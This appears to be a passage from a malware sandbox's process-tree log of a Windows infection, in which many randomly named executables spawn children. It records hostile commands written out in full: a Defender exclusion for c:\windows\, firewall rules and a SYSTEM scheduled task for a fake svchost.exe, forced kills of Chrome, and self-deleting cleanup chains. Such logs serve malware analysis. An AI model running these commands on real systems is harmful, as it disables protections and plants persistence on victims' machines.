                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5740 /prefetch:8
                                                                                                                8⤵
                                                                                                                  PID:7868
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:8040
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3296 /prefetch:2
                                                                                                                    8⤵
                                                                                                                      PID:6972
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1
                                                                                                                      8⤵
                                                                                                                        PID:5176
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
                                                                                                                        8⤵
                                                                                                                          PID:7492
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "cmd.exe" /C taskkill /F /PID 5652 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\swfS_mtAUvY6ZW5Rjf2MqDso.exe"
                                                                                                                        7⤵
                                                                                                                          PID:4260
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /PID 5652
                                                                                                                            8⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:7720
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "cmd.exe" /C taskkill /F /PID 5652 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\swfS_mtAUvY6ZW5Rjf2MqDso.exe"
                                                                                                                          7⤵
                                                                                                                            PID:6956
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /PID 5652
                                                                                                                              8⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:7792
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\uFhLoqRO0J3poBNDVINWPnY7.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\uFhLoqRO0J3poBNDVINWPnY7.exe"
                                                                                                                          6⤵
                                                                                                                            PID:5644
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1256
                                                                                                                              7⤵
                                                                                                                              • Program crash
                                                                                                                              PID:4884
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\L4i5xJFvGnpwRQ0TmDddOLfm.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\L4i5xJFvGnpwRQ0TmDddOLfm.exe"
                                                                                                                            6⤵
                                                                                                                              PID:5636
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\PGPew8vnb2jFQGtl35HpVrJH.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\PGPew8vnb2jFQGtl35HpVrJH.exe"
                                                                                                                              6⤵
                                                                                                                                PID:5628
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 248
                                                                                                                                  7⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:5424
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\ASmyD9enodvq94bLyAGAGtwt.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\ASmyD9enodvq94bLyAGAGtwt.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:5620
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                    7⤵
                                                                                                                                      PID:6628
                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                      7⤵
                                                                                                                                        PID:6956
                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                        7⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:7004
                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                        7⤵
                                                                                                                                          PID:6996
                                                                                                                                        • C:\Windows\System\svchost.exe
                                                                                                                                          "C:\Windows\System\svchost.exe" formal
                                                                                                                                          7⤵
                                                                                                                                            PID:7064
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                              8⤵
                                                                                                                                                PID:6916
                                                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                8⤵
                                                                                                                                                  PID:5164
                                                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                  8⤵
                                                                                                                                                    PID:5440
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\xWF3TgdjubjJ5AX7gGkGmCmd.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\xWF3TgdjubjJ5AX7gGkGmCmd.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:5608
                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\w9mbtTnbHYZIsarHAZWDDlTY.exe
                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\w9mbtTnbHYZIsarHAZWDDlTY.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:5600
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\FdrsJ2BuKalmb1OhjSNQgIjc.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\FdrsJ2BuKalmb1OhjSNQgIjc.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5592
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\SbIiA5sra1fCHEP4B_T8ADSJ.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\SbIiA5sra1fCHEP4B_T8ADSJ.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:5584
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\Nr3u0QkiSi_olBKtEqRvZaVd.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\Nr3u0QkiSi_olBKtEqRvZaVd.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:5576
                                                                                                                                                          • C:\ProgramData\build.exe
                                                                                                                                                            "C:\ProgramData\build.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:6820
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\ProgramData\build.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:1380
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /im build.exe /f
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:2788
                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                    timeout /t 6
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:5796
                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\dIhBEKIxOknNEcIRweTuoCYd.exe
                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\dIhBEKIxOknNEcIRweTuoCYd.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:5564
                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\dIhBEKIxOknNEcIRweTuoCYd.exe
                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\dIhBEKIxOknNEcIRweTuoCYd.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:6228
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\dIhBEKIxOknNEcIRweTuoCYd.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\dIhBEKIxOknNEcIRweTuoCYd.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:6216
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\DdOwxmrFYc1DE2U6ReB1YHL0.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\DdOwxmrFYc1DE2U6ReB1YHL0.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:5556
                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5280
                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:5668
                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5384
                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\hPGXktDAnasGwIGFCP72g0AW.exe
                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\hPGXktDAnasGwIGFCP72g0AW.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5540
                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\aBkfxffiRFd20bN_R_DV_JL5.exe
                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\aBkfxffiRFd20bN_R_DV_JL5.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5532
                                                                                                                                                                                • C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:5752
                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\PokwzW2wnyFBsDpoALCZdOTL.exe
                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\PokwzW2wnyFBsDpoALCZdOTL.exe"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:2536
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\Uc38EacKDaiJxPhX9GexbaoJ.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\Uc38EacKDaiJxPhX9GexbaoJ.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:1608
                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 1608 -s 1436
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:2120
                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\bL5N6JItfKPYYKOvsed2L19e.exe
                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\bL5N6JItfKPYYKOvsed2L19e.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:5824
                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\tBlSwghho9md1Rwl2Jw1N7rc.exe
                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\tBlSwghho9md1Rwl2Jw1N7rc.exe"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:4412
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\tBlSwghho9md1Rwl2Jw1N7rc.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\tBlSwghho9md1Rwl2Jw1N7rc.exe"
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:7660
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\oqBozDTkA7prsfwJCQTvxQlJ.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\oqBozDTkA7prsfwJCQTvxQlJ.exe" /mixtwo
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:4140
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 648
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:6860
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 668
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:5212
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 804
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:5168
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 792
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:6352
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 864
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:7208
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 936
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:7856
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1172
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:6244
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1244
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:1052
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "oqBozDTkA7prsfwJCQTvxQlJ.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\oqBozDTkA7prsfwJCQTvxQlJ.exe" & exit
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:7296
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /im "oqBozDTkA7prsfwJCQTvxQlJ.exe" /f
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:7616
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\SF9nFfSapsz9S8GwaMwzOuVA.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\SF9nFfSapsz9S8GwaMwzOuVA.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:6008
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:1020
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:7924
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\WVEYZmvW69LW1xY6YEgUMmm3.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\WVEYZmvW69LW1xY6YEgUMmm3.exe" silent
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:2628
                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\dVkFlENmp0VlmT_wHxGA1H7l.exe
                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\dVkFlENmp0VlmT_wHxGA1H7l.exe"
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:5036
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-86S2I.tmp\dVkFlENmp0VlmT_wHxGA1H7l.tmp
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-86S2I.tmp\dVkFlENmp0VlmT_wHxGA1H7l.tmp" /SL5="$4045A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\dVkFlENmp0VlmT_wHxGA1H7l.exe"
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:1988
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-C95KQ.tmp\Adam.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-C95KQ.tmp\Adam.exe" /S /UID=2709
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:7548
                                                                                                                                                                                                                    • C:\Program Files\Google\NDVJZETHBD\foldershare.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\NDVJZETHBD\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                        PID:4412
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\97-4b1ca-2d9-c5bb8-f0e4e77c0dad7\Sixymyraenu.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\97-4b1ca-2d9-c5bb8-f0e4e77c0dad7\Sixymyraenu.exe"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:7208
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pkyavuf0.2pz\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                              PID:8236
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\pkyavuf0.2pz\GcleanerEU.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\pkyavuf0.2pz\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                  PID:9132
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 648
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:8340
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 668
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:8976
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 764
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:6484
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 812
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:5092
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 880
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:9064
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 952
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:9080
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 1176
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:8964
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 1188
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pkyavuf0.2pz\GcleanerEU.exe" & exit
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                      PID:6592
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:6108
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r2z45z0j.zjc\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                    PID:8272
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\r2z45z0j.zjc\installer.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\r2z45z0j.zjc\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                        PID:9144
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\r2z45z0j.zjc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\r2z45z0j.zjc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633458136 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:6528
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dbnpquth.ykj\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                          PID:8356
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\dbnpquth.ykj\gcleaner.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\dbnpquth.ykj\gcleaner.exe /mixfive
                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                              PID:9168
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 648
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:8660
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 668
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:7820
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 764
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:5524
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 812
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:8348
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 888
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:7480
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 860
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:5528
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 1184
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:8384
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 1144
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:8856
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dbnpquth.ykj\gcleaner.exe" & exit
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                  PID:6424
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:6164
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zih45e4m.v31\any.exe & exit
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:8324
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\zih45e4m.v31\any.exe
